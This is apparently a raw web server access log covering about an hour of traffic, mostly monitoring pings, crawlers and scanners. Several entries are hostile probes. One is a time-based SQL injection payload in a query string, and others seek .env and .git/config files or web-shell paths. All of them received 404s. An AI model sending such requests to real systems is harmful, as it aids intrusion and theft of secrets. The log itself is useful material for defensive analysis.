148.153.56.84 - - [02/Jul/2025:11:58:14 +0200] "GET /p5Io HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0"
148.153.56.84 - - [02/Jul/2025:11:58:15 +0200] "GET /aab8 HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0"
148.153.56.84 - - [02/Jul/2025:11:58:19 +0200] "GET /jquery-3.3.1.slim.min.js HTTP/1.1" 404 329 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0"
148.153.56.84 - - [02/Jul/2025:11:58:19 +0200] "GET /aab9 HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0"
148.153.56.84 - - [02/Jul/2025:11:58:20 +0200] "GET /jquery-3.3.2.slim.min.js HTTP/1.1" 404 329 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0"
43.153.54.138 - - [02/Jul/2025:11:58:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
212.91.247.32 - - [02/Jul/2025:11:58:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:11:59:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:12:00:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:12:01:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
80.251.153.117 - - [02/Jul/2025:12:02:25 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.247.32 - - [02/Jul/2025:12:02:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.218.84.46 - - [02/Jul/2025:12:03:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.247.32 - - [02/Jul/2025:12:03:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:12:04:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:12:05:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:12:06:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
142.93.7.213 - - [02/Jul/2025:12:07:12 +0200] "GET /squid-internal-mgr/cachemgr.cgi HTTP/1.1" 404 336 "-" "Mozilla/5.0 zgrab/0.x"
212.91.247.32 - - [02/Jul/2025:12:07:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
66.249.64.169 - - [02/Jul/2025:12:08:13 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
212.91.247.32 - - [02/Jul/2025:12:08:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
147.185.133.29 - - [02/Jul/2025:12:09:16 +0200] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
212.91.247.32 - - [02/Jul/2025:12:09:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
80.251.153.117 - - [02/Jul/2025:12:10:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.247.32 - - [02/Jul/2025:12:10:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:12:11:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
142.93.7.213 - - [02/Jul/2025:12:12:54 +0200] "GET /squid-internal-mgr/cachemgr.cgi HTTP/1.1" 404 336 "-" "Mozilla/5.0 zgrab/0.x"
212.91.247.32 - - [02/Jul/2025:12:12:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
141.98.10.162 - - [02/Jul/2025:12:13:11 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.247.32 - - [02/Jul/2025:12:13:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:12:14:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
87.121.84.130 - - [02/Jul/2025:12:14:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0"
87.121.84.130 - - [02/Jul/2025:12:15:21 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0"
43.159.145.153 - - [02/Jul/2025:12:15:41 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
212.91.247.32 - - [02/Jul/2025:12:15:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:12:16:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:12:17:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:12:18:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:12:19:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
141.98.10.162 - - [02/Jul/2025:12:20:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.247.32 - - [02/Jul/2025:12:20:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
87.121.84.212 - - [02/Jul/2025:12:21:41 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.247.32 - - [02/Jul/2025:12:21:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:12:22:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:12:23:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:12:24:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:12:25:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:12:26:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:12:27:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
196.251.83.236 - - [02/Jul/2025:12:28:24 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36"
212.91.247.32 - - [02/Jul/2025:12:28:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
141.98.10.162 - - [02/Jul/2025:12:29:37 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.247.32 - - [02/Jul/2025:12:29:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
121.137.98.180 - - [02/Jul/2025:12:30:19 +0200] "GET / HTTP/1.0" 200 1229 "-" "curl/7.88.1"
212.91.247.32 - - [02/Jul/2025:12:30:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
77.90.153.48 - - [02/Jul/2025:12:31:23 +0200] "GET /api/v1/users HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 11.0) AppleWebKit/537.36 (KHTML, like Gecko) Safari/113.0 Safari/537.36"
77.90.153.48 - - [02/Jul/2025:12:31:25 +0200] "GET /module/tshirtecommerce/designer?product_id=900982561&parent_id=1;SELECT%20SLEEP(8); HTTP/1.1" 404 336 "-" "Mozilla/5.0 (Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Edge/123.0 Safari/537.36"
212.91.247.32 - - [02/Jul/2025:12:31:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
141.98.10.162 - - [02/Jul/2025:12:32:09 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
141.98.10.162 - - [02/Jul/2025:12:32:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.247.32 - - [02/Jul/2025:12:32:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:12:33:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:12:34:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:12:35:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:12:36:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:12:37:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
87.121.84.212 - - [02/Jul/2025:12:38:03 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.247.32 - - [02/Jul/2025:12:38:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:12:39:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:12:40:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
87.121.84.212 - - [02/Jul/2025:12:40:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.247.32 - - [02/Jul/2025:12:41:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
43.135.172.89 - - [02/Jul/2025:12:41:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
160.30.44.120 - - [02/Jul/2025:12:42:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.247.32 - - [02/Jul/2025:12:42:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
162.216.149.221 - - [02/Jul/2025:12:43:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
212.91.247.32 - - [02/Jul/2025:12:43:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:12:44:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:12:45:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
43.167.241.46 - - [02/Jul/2025:12:46:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
212.91.247.32 - - [02/Jul/2025:12:46:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
167.71.37.138 - - [02/Jul/2025:12:47:37 +0200] "GET /form.html HTTP/1.1" 404 314 "-" "curl/8.1.2"
167.71.37.138 - - [02/Jul/2025:12:47:37 +0200] "GET /t4 HTTP/1.1" 404 307 "-" "Mozilla/5.0"
167.71.37.138 - - [02/Jul/2025:12:47:37 +0200] "GET /systembc/password.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
167.71.37.138 - - [02/Jul/2025:12:47:37 +0200] "GET /password.php HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
167.71.37.138 - - [02/Jul/2025:12:47:37 +0200] "\x16\x03\x01" 501 318 "-" "-"
167.71.37.138 - - [02/Jul/2025:12:47:37 +0200] "\x16\x03\x01" 501 318 "-" "-"
167.71.37.138 - - [02/Jul/2025:12:47:37 +0200] "\x16\x03\x01" 501 318 "-" "-"
167.71.37.138 - - [02/Jul/2025:12:47:37 +0200] "GET /upl.php HTTP/1.1" 404 312 "-" "Mozilla/5.0"
167.71.37.138 - - [02/Jul/2025:12:47:37 +0200] "GET /geoip/ HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
167.71.37.138 - - [02/Jul/2025:12:47:37 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
167.71.37.138 - - [02/Jul/2025:12:47:37 +0200] "GET /1.php HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
212.91.247.32 - - [02/Jul/2025:12:47:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
31.14.32.6 - - [02/Jul/2025:12:48:29 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; ModatScanner/1.0; +https://modat.io/)"
87.121.84.212 - - [02/Jul/2025:12:48:30 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.247.32 - - [02/Jul/2025:12:48:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
87.121.84.212 - - [02/Jul/2025:12:49:00 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.218.84.46 - - [02/Jul/2025:12:49:36 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.247.32 - - [02/Jul/2025:12:49:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:12:50:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:12:51:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
49.51.233.95 - - [02/Jul/2025:12:52:04 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
212.91.247.32 - - [02/Jul/2025:12:52:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:12:53:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:12:54:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:12:55:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
43.155.26.193 - - [02/Jul/2025:12:55:58 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
23.94.187.142 - - [02/Jul/2025:12:55:59 +0200] "GET http://whatismyip.akamai.com/ HTTP/1.1" 200 1229 "-" "Go-http-client/1.1"
80.251.153.117 - - [02/Jul/2025:12:56:07 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
87.121.84.212 - - [02/Jul/2025:12:56:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.247.32 - - [02/Jul/2025:12:56:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:12:57:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:12:58:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
87.121.84.212 - - [02/Jul/2025:12:59:07 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
43.166.224.244 - - [02/Jul/2025:12:59:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
212.91.247.32 - - [02/Jul/2025:12:59:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
141.98.10.162 - - [02/Jul/2025:13:00:06 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
78.153.140.151 - - [02/Jul/2025:13:00:16 +0200] "\x16\x03\x01" 501 318 "-" "-"
80.251.153.117 - - [02/Jul/2025:13:00:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.247.32 - - [02/Jul/2025:13:00:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:13:01:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
141.98.10.162 - - [02/Jul/2025:13:02:05 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
80.251.153.117 - - [02/Jul/2025:13:02:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.247.32 - - [02/Jul/2025:13:02:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
141.98.10.162 - - [02/Jul/2025:13:03:11 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.247.32 - - [02/Jul/2025:13:03:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
80.251.153.117 - - [02/Jul/2025:13:04:37 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.247.32 - - [02/Jul/2025:13:04:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:13:05:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:13:06:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
87.121.84.212 - - [02/Jul/2025:13:07:31 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.247.32 - - [02/Jul/2025:13:07:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
87.121.84.212 - - [02/Jul/2025:13:08:34 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.247.32 - - [02/Jul/2025:13:08:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
87.121.84.212 - - [02/Jul/2025:13:09:09 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
43.130.9.111 - - [02/Jul/2025:13:09:10 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
164.92.191.35 - - [02/Jul/2025:13:09:42 +0200] "GET /.git/config HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Linux; Android 9; CPH1859) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.143 Mobile Safari/537.36"
212.91.247.32 - - [02/Jul/2025:13:09:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:13:10:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:13:11:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:13:12:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
65.49.20.67 - - [02/Jul/2025:13:13:28 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.247.32 - - [02/Jul/2025:13:13:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
184.105.247.195 - - [02/Jul/2025:13:14:06 +0200] "\x16\x03\x01" 501 318 "-" "-"
162.62.213.187 - - [02/Jul/2025:13:14:53 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
212.91.247.32 - - [02/Jul/2025:13:14:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.218.84.45 - - [02/Jul/2025:13:15:17 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
87.121.84.149 - - [02/Jul/2025:13:15:30 +0200] "GET http://ifconfig.me/ HTTP/1.1" 200 1229 "-" "curl/7.81.0"
212.91.247.32 - - [02/Jul/2025:13:15:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.160.147.29 - - [02/Jul/2025:13:16:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
